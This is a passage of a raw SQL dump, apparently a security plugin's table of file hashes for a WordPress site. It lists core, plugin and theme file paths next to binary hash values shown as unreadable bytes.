u���Lqm<.�ќ3/X�c�[','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r�	S[l��','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�2�~����CO�',',f;��8`�=�[D�\n\\cA�O�Te�� ','',0,'?'),('�ǜq��s&�[�[$','wp-content/themes/magazine-hoot/hybrid/inc/class-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�jG�{xu�X x�','�a�\'MrF�\r��b�O?\n�\rM�W-�','',0,'?'),('����I�*�:o�','wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�zZ�f���ip^�2׎','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('��\0h�+�)m�D\nW;��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�%$�$�H�b@��','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�!�֐(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����)	','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$?6/�%��k�<j��@�','����\r�/�t��:to���7�L�~���QLl~S','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J	�A��a�\\L�dz���4���~U�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j\'�~?2��]�g�Z','�c<*WB!�,�5\ZTQEF�#��h_a�~�','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��Pk��=���ٰJ�w','wp-content/themes/magazine-hoot/include/admin/images/slider-width-stretch.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�C�f<|r	zq�X�6','�y9�g�����-���oǹz��o\n�','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N	�S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('����	�6��\r�l���','wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[	$3','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�<P�S2��ȯV','Ӡ‘�P�G�B���$���	�JE3�n^�','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(�†�','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�\n�.[�%�','\Zw<��>��s-��ӆd��@D�>f�\"�3','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�:	ڂa�7��Zcdm��%','',0,'?'),('�{m����5U3�Y����','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���<�ِ�J��D��','�#�[�\Z*\n�L���=I�Dwguwd��,�\'�IE?�','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�瑥���\n��bk\0�q','��\n	�U����y���A��80CĆ���6$3','',0,'?'),('���qXr:�Hx�[','wp-content/plugins/wp-cerber/assets/flags/ad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\Z�3�	{��/_s_5�','j�~�+��E�A�9��M���\Z��e���c0T','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('��|����tMI.\Z','wp-content/themes/magazine-hoot/include/template-helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Mӡ�1X','����7eA�^$�=\"d��n�hŌ�慄�aQ','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('�\r�V��2P�-+x@�','wp-content/themes/twentynineteen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JŐ\\�;�^�q��','}�D�uغ��i��I|�{�&��މ��g��0���','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�1t�v�3�9]AaC-','wp-content/plugins/wp-cerber/assets/flags/bs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�t\Z���c��K�o�','_o	&�\'����&�Q�R���~E�1�d','',0,'?'),('�q6DF>�?|��!�','wp-content/themes/magazine-hoot/template-parts/sidebar-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�щn�u�$��?�p���','LG���)�z��H�1�7�5�K�a{��2�d0Q�','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M#Ƃ,�n���j9{��','��+��������N)¨�����L	K�z�(','',0,'?'),('������浉���C��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/6���Kd���|D','�)7; @v�L��>�]M|�c����)d����k','',0,'?'),('�����5��E�r','wp-content/plugins/wp-cerber/assets/flags/nr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*s�|�Ǯr�St��[','�bp%�a���,%M���q�^��4���$}�J','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('��A-��zN���','wp-content/themes/twentynineteen/inc/helper-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŀ<)�8�j���/SԜ','�ք��8�J��j��\n�� ��g�^\'�','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�㚮�4�~�l��v-','0�co	觥���.����_A�T�\0^����)','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}����	y���v�','',0,'?'),('�(��u�L)����O','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��7<�yf�\nb:ʄ','&O3w��Q��d�x�������@\n���m�?�$','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Ke򩶂�\"/�w�','KwĿ���\Z˅�+CH�J\n\'��x ���M','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���G-w���=�','|6���.�W��NScˆ��#��ޱ\0�2','',0,'?'),('�ݧlp�S*LST$�8/','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���/k�$a��E9h�','8�E/ů�KK\rЛx���]2j�IԐu\r�kz','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�INo<�Rz�I����','�Op�2�j�|:,��a:�weҽ�H�S�/�.','',0,'?'),('�^Q6l��J!�	�ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('��+�x�~� yi&\0Q','wp-content/themes/twentytwentyone/template-parts/header/site-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e@ڞF\n��1���','ǛO��g�\ZXPECn��o�`�����+�i','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('�0�$�\'`�Õ�n�\\','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!<��Tp���+','�I�ʌ�?�(5�]]F�r�A�~�{t�J?��','',0,'?'),('��ɱ%��a{Z�j	%�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('�����\Z3-%�1f�w.','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���[���t��9M','�U� \\�~̢xo������U�Kc�i�����W/','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[~ .z\n.a�Y^�h�w','�(��� �̰�bu���e�\nud���l�s&�׵','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(-\'���R���\"','�ݔ��7��\"^D�C���o>0ս�2]L�','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M0����*��','���-ZE�\n�*��6�]\\� ]m�{N��','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�V(#=���0�����?','�8�;�cb7�]���tt-p��#�Q(��C��','',0,'?'),('�	e1�n2��c��Χ','wp-content/plugins/wp-cerber/assets/flags/uz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��S�UA��R-Ƌ','Ț���1}\n{%`Tbh����3�ٷ���.D�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eƧ�A.�E�2��$','YPU���ѱ�O�*��N=|H�Tt���\\8`','',0,'?'),('��A����)͹D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s_7�;�	]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�.� h`3XT\\W�ߴ','4�G˼���GO��w���m�qV�z8��밹','',0,'?'),('�H}�A�J�\nG�o)u','wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��᳀��2���rmV','���r���J]s6�8�˜2!��\ZpG����','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϼ~c��祐i�','��L�3�gQ����������l\"�K�E�3_','',0,'?'),('�w	���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�_\r�w�{iv�','W�q��$�|��yn���a�$\06ܖ<(�Ƴ�}','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E~��2\'o	�?�','�	UWt��\"\Z��;��|w�^	r\"�:[_cA�}','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('��ؘ�-�m4)}��	�','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�F疋��nA�^','�KJE(iLõN��5���KTc�B0$]�-}�۹','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����ħ7�	�7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('�D����]�|߼�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('��Bl�k�\'�U^�w�','wp-content/themes/magazine-hoot/hybrid/customize/setting-image-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nՎx(��(.�^\n','-�ɱ)�b,%�N~���n�Mc�sb��x��h�','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2΢�	�/�E!�<s�','\\�=���5��3	�ώv��_%�2��A�?$','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('�])��	���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۴iN��fF�=w�','A35(Lt/������v_��#UV猌����M','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�3������9`w�q','wp-content/themes/twentynineteen/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;9���K�K�\'��!','���5.\0��$�V�u�aˆ��+EI�H�h{ �\'','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;_Ǡ8Є��=�','\0ҧ]W���	�M�o�5m�d�p�Hb#�Wp�M\'','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�q_=�s9�N�@ũ�','(�R�ƒQ�c�4o{]�����R��RZW','',0,'?'),('�]	���n_�ˤ[l���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�y?>�F�\n~^�','Z��\n�\r�~YW�m���U����9Ft�Q��','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v,d��,��ȁ��','�-(wE��Cg�E��u���\"�u�7������','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�(�� \r$','W��W�B�/hfq!�r|�{z`-+k�D�','',0,'?'),('�}�\Z��F?�Fs�v��#','wp-content/themes/twentynineteen/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','42�����r!�j����','�.\\��J�� ��TC~0���=�/�����','',0,'?'),('�,5X��{�e�','wp-content/plugins/wordfence/js/wfpopover.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��|M�S�p`gK~�','e�^��\'a;H�%	V�<�e5iXT\n܎~T�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� 